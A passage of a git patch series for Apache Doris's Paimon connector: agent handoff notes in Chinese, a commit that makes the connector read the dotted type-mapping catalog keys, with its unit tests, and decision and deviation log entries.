path-whitelist,严禁 `git add -A`。 +- **HEAD = `2d15b1b7ed7`**(`fix: FIX-JDBC-DRIVER-URL`,本 session #4;checkpoint docs commit 紧随)。该 fix commit = #4 连接器码(main+test)+设计 doc+D-050+DV-028/029+RFC §24+task-list 进度(10 文件,无 regression-conf/scratch)。 +- **本 checkpoint commit 改动**:`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#4 commit-cell 填 hash)。 +- ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 +- scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 - **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:`512a67ee3ac`(B0)→`807308993fb`(B1)→`a2b765677d1`(B2/B3)→`ae5ad30b938`(B4)→`d2a2c8d761a`(B5/B6)→`98a73bf7692`(B7+fixes)→`20b19d19dd8`(rereview2 #1 URI-NORMALIZE)→`d23d5df9914`(rereview2 #2 STATIC-CREDS-BE, HEAD)。 +- 迁移链:…→`667f779af04`(#3 SCHEMA-EVOLUTION)→`2d15b1b7ed7`(#4 JDBC-DRIVER-URL, HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** -- 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带项目 Co-Authored-By trailer。 -- 改 fe-core/SPI 的 fix(#1/#2/#3,可能 #4/#6):commit 须含连接器 + SPI + fe-core 三侧 + 测试,按 path-whitelist 加。 +- 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 +- 改 fe-core/SPI 的 fix:commit 须含连接器 + SPI + fe-core 三侧 + 测试(#5 大概率纯连接器/FE-wiring)。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。 -- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(决定 task-list「SPI?」列:B1/B3/B2 因不能 import `LocationPath`/`StorageProperties` 须走 fe-core 桥或新 `ConnectorContext` SPI 缝)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**(漏 `-am` 会因 `${revision}` 解析失败报「could not resolve fe-connector-spi」而非真错——本 session 踩过)。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。 +- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 - 测试优先 runnable FE **单测**(连接器 harness:`FakePaimonTable`/`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`PaimonScanPlanProviderTest`);live-e2e(S3/OSS/REST/JDBC/Kerberos)CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta +- **#4 验证的高价值模式**:scout workflow(5 并行 reader 复核 finding + legacy parity + SPI 缝)→ 设计 → 实现 → **fail-before 实测**(临时 neuter 源码、`-am` 跑两测类、确认正确的 5 个 bug-catcher 向红、其余 guard 测两态皆绿)→ **4-lens clean-room review + 独立 verify**(揪出 CREATE-time-only 校验 gap)。**对 BLOCKER/安全类 fix 务必做 review**([[clean-room-adversarial-review-pref]])。 - 改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方(历史教训:独立 handle 面绕 seam 会静默错行)。 -- P2 两条(count-pushdown、sub-split)严重度有争议(R1 判 MINOR、R2 判 MAJOR,均「结果正确仅性能」)—— **先找用户定 scope 再动手**,别默认按 MAJOR 全做。 -- M-crit(mapping-flag)未过 3-lens 对抗验证 → 实现前先独立复核 dotted-vs-underscore key 事实成立再修。 +- P2 两条(#8/#9)严重度有争议 → **先找用户定 scope 再动手**。M-crit(#5)未过 3-lens → 实现前先独立复核 dotted-vs-underscore key 事实。 +- **#4 留的跨连接器 follow-up([DV-028])**:CREATE-time-only driver-url 校验是 fe-core 全 plugin 连接器共有缝;若将来要 close,须新 `ConnectorContext` scan-time 校验 hook + fe-core ALTER 路接 `preCreateValidation`(注意会触发 JDBC 连接器 BE 连通测)—— 独立工单,非 paimon 专属。 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 6f1d2fab921763..3aabcf370a800c 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -26,7 +26,7 @@ | 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | ✅ `20b19d19dd8` | | 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ `d23d5df9914` | | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ✅ `667f779af04` | -| 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | 🔄 commit | +| 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | ✅ `2d15b1b7ed7` | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | From d683fce9effd5467ad8bfe2d98f88b7fe2ed040d Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 21:43:32 +0800 Subject: [PATCH 022/128] =?UTF-8?q?fix:=20FIX-MAPPING-FLAG-KEYS=20?= =?UTF-8?q?=E2=80=94=20read=20canonical=20dotted=20catalog=20keys=20for=20?= =?UTF-8?q?paimon=20type-mapping=20toggles?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: after the SPI cutover the paimon connector reads the type-mapping toggles from UNDERSCORE keys (enable_mapping_binary_as_varbinary / enable_mapping_timestamp_tz; PaimonConnectorProperties:39,42 -> PaimonConnectorMetadata.buildTypeMappingOptions), but fe-core only ever writes the canonical DOTTED catalog keys (enable.mapping.varbinary / enable.mapping.timestamp_tz; CatalogProperty:50,52, written/defaulted by ExternalCatalog.setDefaultPropsIfMissing and hidden via HIDDEN_PROPERTIES). PluginDrivenExternalCatalog.createConnectorFromProperties hands the connector the raw catalog property map verbatim, so getOrDefault(underscore,"false") is always false. Even when the user enables the mapping at CREATE CATALOG, Paimon BINARY stays STRING and TIMESTAMP_WITH_LOCAL_TIME_ZONE stays DATETIMEV2 — a silent cutover regression (legacy PaimonExternalTable:350 reads the dotted key and honors it). The binary key is doubly drifted (separator . -> _ AND token varbinary -> binary_as_varbinary), so a generic dot->underscore normalizer would not fix it. Latent until the flag is enabled. Re-confirmation: M-crit was critic-surfaced (not 3-lens-gated), so the finding was independently re-verified by a 5-agent scout + adversarial synthesizer (REAL_BUG, high confidence; false-positive steelman rejected — dotted is canonical per the original feature PRs, every regression CREATE CATALOG, legacy parity, and the JDBC connector which kept dotted in the same SPI PR). Solution (connector-only, zero new SPI, no BE): re-point the two PaimonConnectorProperties constants to the canonical dotted keys (ENABLE_MAPPING_VARBINARY = "enable.mapping.varbinary", renamed from ENABLE_MAPPING_BINARY_AS_VARBINARY to match the CatalogProperty/JDBC/iceberg convention and fix both separator and token; ENABLE_MAPPING_TIMESTAMP_TZ = "enable.mapping.timestamp_tz") and update the one reference in PaimonConnectorMetadata. No logic change — the Options(mapBinaryToVarbinary, mapTimestampTz) arg order is already correct. BE-side consistency verified: PluginDrivenScanNode extends FileQueryScanNode and inherits the dotted-key read for the BE scan param (FileQueryScanNode:192-193,635-678), so FE column type and BE scan param now agree (they diverged before this fix). Scope: paimon-only (user-signed D-051). NEW hive + iceberg connectors share the identical root cause; logged as a cross-connector follow-up (DV-030), not fixed here. Rejected an fe-core dot->underscore normalizer (broader blast, breaks JDBC which already reads dotted, and insufficient for paimon's renamed token). Tests (PaimonConnectorMetadataTest): +2 UT. getTableSchemaHonorsDottedMappingKeys (bug-catcher) sets the dotted keys true and asserts BINARY->VARBINARY / LTZ->TIMESTAMPTZ; getTableSchemaDefaultsMappingFlagsOff (guard) asserts the default-off STRING/DATETIMEV2. Module 234/0/0 (1 CI-gated skip), checkstyle 0, import-gate clean. Fail-before verified: the bug-catcher reddens on the underscore key (expected but was ) while the guard stays green. E2E test_paimon_catalog_{varbinary,timestamp_tz}.groovy are CI-gated (enablePaimonTest=false + external fixture) — not run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonConnectorMetadata.java | 2 +- .../paimon/PaimonConnectorProperties.java | 21 ++++- .../paimon/PaimonConnectorMetadataTest.java | 67 ++++++++++++++++ plan-doc/decisions-log.md | 1 + plan-doc/deviations-log.md | 3 +- plan-doc/task-list-P5-rereview2-fixes.md | 2 +- .../P5-fix-MAPPING-FLAG-KEYS-design.md | 78 +++++++++++++++++++ 7 files changed, 167 insertions(+), 7 deletions(-) create mode 100644 plan-doc/tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 861b787e42d7c6..a6a7579d737ad8 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -1017,7 +1017,7 @@ private List mapFields(List fields, List pri private static PaimonTypeMapping.Options buildTypeMappingOptions(Map props) { boolean binaryAsVarbinary = Boolean.parseBoolean( props.getOrDefault( - PaimonConnectorProperties.ENABLE_MAPPING_BINARY_AS_VARBINARY, + PaimonConnectorProperties.ENABLE_MAPPING_VARBINARY, "false")); boolean timestampTz = Boolean.parseBoolean( props.getOrDefault( diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java index dffbb5148dabed..08df7f8720c376 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java @@ -35,11 +35,24 @@ public final class PaimonConnectorProperties { /** Warehouse location for the Paimon catalog. */ public static final String WAREHOUSE = "warehouse"; - /** Whether to map Paimon BINARY/VARBINARY to Doris VARBINARY instead of STRING. */ - public static final String ENABLE_MAPPING_BINARY_AS_VARBINARY = "enable_mapping_binary_as_varbinary"; + /** + * Whether to map Paimon BINARY/VARBINARY to Doris VARBINARY instead of STRING. + * + *

      Canonical (dotted) CREATE-CATALOG key, mirroring fe-core + * {@code CatalogProperty.ENABLE_MAPPING_VARBINARY} and the legacy paimon path. The connector + * receives the raw catalog property map ({@code catalogProperty.getProperties()}), which only + * ever carries this dotted key (fe-core {@code setDefaultPropsIfMissing} writes only it), so the + * read MUST use the dotted spelling — an underscore variant is never present and would read false. + */ + public static final String ENABLE_MAPPING_VARBINARY = "enable.mapping.varbinary"; - /** Whether to map Paimon TIMESTAMP_WITH_LOCAL_TIME_ZONE to TIMESTAMPTZ. */ - public static final String ENABLE_MAPPING_TIMESTAMP_TZ = "enable_mapping_timestamp_tz"; + /** + * Whether to map Paimon TIMESTAMP_WITH_LOCAL_TIME_ZONE to TIMESTAMPTZ. + * + *

      Canonical (dotted) CREATE-CATALOG key, mirroring fe-core + * {@code CatalogProperty.ENABLE_MAPPING_TIMESTAMP_TZ} and the legacy paimon path. + */ + public static final String ENABLE_MAPPING_TIMESTAMP_TZ = "enable.mapping.timestamp_tz"; /** Default catalog type when not specified. */ public static final String DEFAULT_CATALOG_TYPE = "filesystem"; diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java index 0573d2ec5bce88..373159dd11de7b 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java @@ -287,4 +287,71 @@ public void getTableSchemaAtSnapshotAlsoForcesNullable() { Assertions.assertTrue(schema.getColumns().get(0).isNullable(), "the at-snapshot read path must also force columns nullable (legacy parity)"); } + + // --------------------------------------------------------------------- + // FIX-MAPPING-FLAG-KEYS — type-mapping toggles read the canonical dotted + // CREATE-CATALOG keys (enable.mapping.varbinary / enable.mapping.timestamp_tz) + // --------------------------------------------------------------------- + + private static RowType binaryAndLtzRowType() { + return RowType.builder() + .field("b", DataTypes.BINARY(16)) + .field("ts_ltz", DataTypes.TIMESTAMP_WITH_LOCAL_TIME_ZONE(3)) + .build(); + } + + @Test + public void getTableSchemaHonorsDottedMappingKeys() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = new FakePaimonTable( + "t1", binaryAndLtzRowType(), Collections.emptyList(), Collections.emptyList()); + + // The user enables both mappings via the canonical DOTTED CREATE-CATALOG keys — the only + // spelling fe-core ever writes into the catalog property map (CatalogProperty.java:50,52; + // ExternalCatalog.setDefaultPropsIfMissing). The connector receives that raw map verbatim. + Map props = new java.util.HashMap<>(); + props.put("enable.mapping.varbinary", "true"); + props.put("enable.mapping.timestamp_tz", "true"); + PaimonConnectorMetadata metadata = + new PaimonConnectorMetadata(ops, props, new RecordingConnectorContext()); + + ConnectorTableHandle handle = metadata.getTableHandle(null, "db1", "t1").get(); + ConnectorTableSchema schema = metadata.getTableSchema(null, handle); + + // WHY: when the user enables the mapping at CREATE CATALOG, a Paimon BINARY column must + // surface as VARBINARY and a TIMESTAMP_WITH_LOCAL_TIME_ZONE column as TIMESTAMPTZ — legacy + // parity (PaimonExternalTable.java:350 reads the same dotted key and honors it). MUTATION: + // reverting the connector constants to the underscore spelling (the cutover bug: + // enable_mapping_binary_as_varbinary / enable_mapping_timestamp_tz) makes getOrDefault miss + // the dotted keys the map actually carries -> both flags read false -> the column types fall + // back to STRING / DATETIMEV2 -> red. This closes critic coverage-gap #2. + Assertions.assertEquals("VARBINARY", schema.getColumns().get(0).getType().getTypeName(), + "enable.mapping.varbinary=true must map Paimon BINARY to Doris VARBINARY"); + Assertions.assertEquals("TIMESTAMPTZ", schema.getColumns().get(1).getType().getTypeName(), + "enable.mapping.timestamp_tz=true must map Paimon LTZ to Doris TIMESTAMPTZ"); + } + + @Test + public void getTableSchemaDefaultsMappingFlagsOff() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = new FakePaimonTable( + "t1", binaryAndLtzRowType(), Collections.emptyList(), Collections.emptyList()); + + // No mapping keys set — the default (legacy-compatible) behavior. + PaimonConnectorMetadata metadata = + new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); + + ConnectorTableHandle handle = metadata.getTableHandle(null, "db1", "t1").get(); + ConnectorTableSchema schema = metadata.getTableSchema(null, handle); + + // WHY: with the toggles absent, BINARY must map to STRING and LTZ to DATETIMEV2 (default + // false), matching legacy. This guards against a fix that accidentally flips the defaults on + // (e.g. reading the wrong default or inverting the boolean). MUTATION: defaulting either flag + // to true -> VARBINARY / TIMESTAMPTZ -> red. Green in both the buggy and fixed states (it + // pins the default, not the key spelling), so it is a regression guard, not the bug-catcher. + Assertions.assertEquals("STRING", schema.getColumns().get(0).getType().getTypeName(), + "absent enable.mapping.varbinary must leave Paimon BINARY as STRING (default off)"); + Assertions.assertEquals("DATETIMEV2", schema.getColumns().get(1).getType().getTypeName(), + "absent enable.mapping.timestamp_tz must leave Paimon LTZ as DATETIMEV2 (default off)"); + } } diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 5c88882cb4ebee..6d299cbb9b43aa 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-051 | P5-fix#5 | **FIX-MAPPING-FLAG-KEYS(M-crit MAJOR,纯连接器/FE-wiring,无 BE/无 SPI)作用域 = paimon-only 修 + hive/iceberg 跨连接器 follow-up(用户签字,2026-06-11)**:翻闸后 paimon 连接器类型映射两开关**静默失效**——连接器读**下划线**键 `enable_mapping_binary_as_varbinary`/`enable_mapping_timestamp_tz`(`PaimonConnectorProperties:39,42`→`PaimonConnectorMetadata.buildTypeMappingOptions`),但 fe-core 只写**点分**键 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz`(`CatalogProperty:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306` 仅写点分键;`HIDDEN_PROPERTIES` 仅藏点分键)→ `PluginDrivenExternalCatalog.createConnectorFromProperties` 把**原始** catalog map 原样喂连接器 → `getOrDefault(下划线,"false")` 恒 false → 即便用户在 CREATE CATALOG 开启,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(legacy `PaimonExternalTable:350` 读点分键并 honor → cutover 回归,flag 启用前 latent)。binary 键**双重漂移**(分隔符 `.`→`_` 且 token `varbinary`→`binary_as_varbinary`)→ 通用归一化器修不了。**M-crit 是 critic-surfaced 未过 3-lens → 先独立复核**(5-agent scout + 对抗 synthesizer workflow `wf_a3626c54-0db` → REAL_BUG high-conf,false-positive steelman 被否:原始 feature PR #57821/#59720、全 regression CREATE CATALOG(paimon/iceberg/hive/jdbc 皆点分)、legacy parity、同 SPI PR 迁移的 JDBC 连接器正确保点分 `JdbcConnectorProperties:66-67` 均证点分为 canonical)。**修(纯连接器、零 SPI/BE)**:`PaimonConnectorProperties` 两常量重指 canonical 点分键(binary 常量并改名 `ENABLE_MAPPING_VARBINARY` 对齐 CatalogProperty/JDBC/iceberg 约定,同修分隔符+token)+ 更新 `PaimonConnectorMetadata` 一处引用;`Options(mapBinaryToVarbinary,mapTimestampTz)` 顺序本就对、无逻辑改。**BE 一致性已核**:`PluginDrivenScanNode extends FileQueryScanNode` 不 override mapping getter → BE scan param 经继承的 `getEnableMappingVarbinary/Tz` 本就读点分键(`FileQueryScanNode:192-193,635-678`),故修连接器 FE 侧读后 FE 列型与 BE scan param 一致(修前两侧分歧)。**用户定 = paimon-only**(vs 一次修全 3 连接器)→ hive/iceberg 同根因登 [DV-030](./deviations-log.md) 跨连接器 follow-up(hive `enable_mapping_binary_as_string` 是误名非语义反转)。否决 fe-core 归一化器(blast 大/破 JDBC 已正确读点分/对 paimon 双重漂移不足)。守门:模块 234/0/0(1 CI-gated skip)、checkstyle 0、import-gate 净、fail-before bug-catcher 向红(期望 VARBINARY 实得 STRING)+guard 两态绿。真值闸=`test_paimon_catalog_{varbinary,timestamp_tz}.groovy`(CI-gated,enablePaimonTest=false+外部 fixture)。设计 [`P5-fix-MAPPING-FLAG-KEYS-design.md`](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) | 2026-06-11 | ✅ | | D-050 | P5-fix#4 | **FIX-JDBC-DRIVER-URL(B-8a BLOCKER + B-8b 安全)作用域 = CREATE-time 校验 parity(用户签字,2026-06-11)**:JDBC flavor 连接器(a)`PaimonScanPlanProvider.getBackendPaimonOptions` 把 `driver_url` **裸**转发给 BE 且 `startsWith("jdbc.")` filter 丢 `paimon.jdbc.*` 别名 → BE `JdbcDriverUtils.registerDriver` 的 `new URL("mysql.jar")` 抛 `MalformedURLException`(B-8a 功能 BLOCKER);(b)driver_url 无 format/allow-list/secure-path 校验 + stale「paimon 不在 SPI_READY_TYPES」注释(B7 后已假,`CatalogFactory:51` 含 paimon)(B-8b 安全)。**修 = 纯连接器、零新 SPI**(复用既有 `Connector.preCreateValidation` + `ConnectorValidationContext.validateAndResolveDriverPath`):B-8a 在 `getBackendPaimonOptions` 用 `firstNonBlank(JDBC_DRIVER_URL)` 认两别名 + 抽出共享 `PaimonCatalogFactory.resolveDriverUrl`(FE 注册与 BE 选项同解析)发 canonical `jdbc.driver_url`(resolved)+`jdbc.driver_class`(镜像 legacy `PaimonJdbcMetaStoreProperties.getBackendPaimonOptions`);B-8b override `PaimonConnector.preCreateValidation` 对 jdbc flavor 调 `validateAndResolveDriverPath`(镜像 `JdbcDorisConnector`)+ 删 stale 注释。**4-lens clean-room review 确认 B-8a + CREATE-time B-8b 正确**,揪出**校验仅 CREATE-time**(FE-restart reload/ALTER CATALOG/scan-time 不复校)= **pre-existing fe-core 缝、所有 plugin 连接器共有(含 JDBC 参考连接器)、默认配置 permissive 无可绕**,legacy 更强(每 scan 经 getFullDriverUrl 复校)。**用户定 = 接受 CREATE-time parity**(vs 扩到 fe-core ALTER hook + scan-time 校验 SPI——触 fe-core+全连接器+ALTER 可能触发 BE 连通测,非 surgical)→ 登 [DV-028](./deviations-log.md)(CREATE-time-only 校验 gap + 跨连接器 follow-up)+ [DV-029](./deviations-log.md)(简化 resolver + BE-side user/password/uri 别名 out-of-scope)。守门:模块 232/0/0、checkstyle 0、import-gate 净、fail-before 5/9 向红。真值闸=`test_paimon_jdbc_catalog`(CI-gated)。设计 [`P5-fix-JDBC-DRIVER-URL-design.md`](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) | 2026-06-11 | ✅ | | D-049 | P5-fix#3 | **FIX-SCHEMA-EVOLUTION(B-1a BLOCKER + M-10 MAJOR)= Design C「连接器直建 thrift schema 字典」(用户签字,2026-06-11;M-10 deferred)**:翻闸后 native(ORC/Parquet) 读丢 paimon schema-evolution——连接器只发 per-file `TPaimonFileDesc.schema_id`、从不设 scan 级 `TFileScanRangeParams.current_schema_id`/`history_schema_info` → BE `table_schema_change_helper.h:219-237` 走 `!__isset` 分支退化**名匹配** → schema-evolved(改名/重排)表旧 schema 文件**静默错行/读 NULL**(JNI 路不受影响、native 是默认)。**关键事实**(5 层 trace + BE `table_schema_change_helper.cpp:312-430`):field-id 匹配路 BE 只读 `TField.{id,name,type.type 当 nested-vs-scalar tag}`、**从不读 Doris Type 也不读 tuple descriptor** → 连接器可**直建** `TSchema`(`org.apache.doris.thrift.*` import-legal)、**无需 Doris Type/无新 SPI**;`Column.uniqueId`(M-10) 仅当 FE 从 Doris 列建 history 才有关、直接从 paimon `DataField.id()` 建则 B-1a 独立于 M-10。**用户定 = Design C(vs Design B「穿 ConnectorColumn/ConnectorType field-id + fe-core ExternalUtil 建」)**:连接器在 `getScanNodeProperties` 从 live(snapshot-pinned)表建 `current_schema_id=-1`+`history_schema_info`(-1 entry=pinned schema、外加每个 `SchemaManager.listAllIds()` 提交 schema)→ base64 thrift carrier prop 经既有 `populateScanLevelParams` SPI hook(复用 DV-006 同缝)落 params。**零新 SPI surface**(task-list 原标「SPI?=yes」修正为 no)、连接器局部、最小 blast radius;M-10(`Column.uniqueId=-1`)**deferred**(rereview2 §4 已证伪 standalone repro、无消费者,[DV-026](./deviations-log.md))。**3-lens clean-room review 揪出 2 真 BLOCKER(均在 -1 entry,已修+复验 clean)**:① 列名 casing(BE verbatim key vs lowercase slot name + `current_schema_id=-1` 永不走 ConstNode 快路 → 大小写混合列即崩、连未演化表都回归)→ 修 = -1 entry **只** lowercase 顶层名(default-locale,byte-match slot 产出方+legacy `parseSchema:507`;嵌套 struct 名保 paimon-case=legacy `PaimonUtil:302` 非对称);② 时间旅行(-1 entry 取 `schemaManager.latest()` 绝对最新、但 tuple 用 pinned schema → 改名列崩/错行)→ 修 = -1 entry 取 `((FileStoreTable)table).schema()`(pinned)、guard `DataTable`→`FileStoreTable`。MINOR(eager 读全 schema 无 cache)= 接受的 fail-loud 偏差 [DV-027](./deviations-log.md)。守门:模块 222/0/0(+5 schema-evo UT)、checkstyle 0、import-gate 净。真值闸=`test_paimon_full_schema_change.groovy`(CI-gated)。设计 [`P5-fix-SCHEMA-EVOLUTION-design.md`](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) | 2026-06-11 | ✅ | | D-048 | P5-fix#2 | **FIX-STATIC-CREDS-BE(B-9 BLOCKER)作用域 = full legacy-parity 替换(用户签字,2026-06-11)**:翻闸后 paimon 连接器 `PaimonScanPlanProvider.getScanNodeProperties:372-381` 把静态 catalog 凭据/配置(`s3.`/`oss.`/`cos.`/`obs.`/`hadoop.`/`fs.`/`dfs.`/`hive.` 前缀)裸拷进 `location.`,fe-core bridge `PluginDrivenScanNode.getLocationProperties` 只剥前缀不归一化 → BE native(FILE_S3) reader 只认 `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`(`s3_util.cpp`)→ 私有桶 native 读拿不到凭据 403。是 review §9.3 凭据**第三道缝**(static→BE-scan,FIX-STORAGE-CREDS 修 catalog FileIO 缝、FIX-REST-VENDED 修 vended 缝,本缝两轮均漏)。legacy `PaimonScanNode.getLocationProperties:650-652` 仅返回 `CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap)`(canonical map)。**用户定 = 方案 A(full legacy-parity,非窄 object-store-only)**:新 SPI `ConnectorContext.getBackendStorageProperties()`(default 空,仅 paimon 调)= 引擎用 #1 已接线的 `storagePropertiesSupplier`(`catalogProperty.getStoragePropertiesMap()`)跑同一 `getBackendPropertiesFromStorageMap` → 连接器**整段**替换裸拷循环为该 overlay(vended overlay 仍后置、collision 胜,legacy 优先序)。object-store→`AWS_*`;HDFS→canonical(保留用户 `hadoop.`/`dfs.`/`fs.`/`juicefs.` override + 补 legacy 默认 `ipc.client.fallback-to-simple-auth-allowed` 等,**顺修 review §211 MINOR**);丢非-parity `hive.*` 裸键(legacy 本不发 scan location)。一处 SPI 调用替掉前缀循环、单一真相源、无漂移。**ANONYMOUS-leak 边角经 BE 证伪无回归**(`s3_util.cpp` v1:383/v2:448 显式 ak/sk 优先于 `cred_provider_type`,vended keys 在则永不走 Anonymous 支)。无 ctor 改、无连接器新 import(import-gate 净)。SPI RFC §22(E14)。测:fe-core `DefaultConnectorContextBackendStoragePropsTest`(2)+连接器 `PaimonScanPlanProviderTest`(3 改/增,red-check 2/3 向红);模块 217/0/0。设计 [`P5-fix-STATIC-CREDS-BE-design.md`](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md) | 2026-06-11 | ✅ | diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 73889c9aaffbb5..db71a3e65b7b4d 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,11 @@ ## 📋 索引 -> 时间倒序;当前共 **29** 项。 +> 时间倒序;当前共 **30** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-030 | P5-fix#5 FIX-MAPPING-FLAG-KEYS 跨连接器 follow-up(用户定本轮 paimon-only):**新 hive + iceberg 连接器同根因**——读**下划线** mapping-flag 键而 fe-core 只写/读/藏**点分** catalog 键(`CatalogProperty:50,52`),`PluginDrivenExternalCatalog.createConnectorFromProperties` 喂原始 catalog map、中间无点分→下划线归一化 → 用户在 CREATE CATALOG 开 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz` 对 hive/iceberg 亦**静默失效**(BINARY→STRING、LTZ→DATETIMEV2)。**iceberg** = `enable_mapping_varbinary`/`enable_mapping_timestamp_tz`(`IcebergConnectorProperties:46,47`→`IcebergConnectorMetadata:151,154`),仅分隔符差、语义不反转。**hive** = `enable_mapping_binary_as_string`/`enable_mapping_timestamp_tz`(`HiveConnectorProperties:52,53`→`HiveConnectorMetadata:317,319`),binary 键既改分隔符又改 token,但 `binary_as_string` 是**误名非语义反转**(`HmsTypeMapping:90-93` true→VARBINARY,喂 `mapBinaryToVarbinary` 字段)。JDBC 是唯一正确的新连接器(点分)。legacy hive/iceberg 经 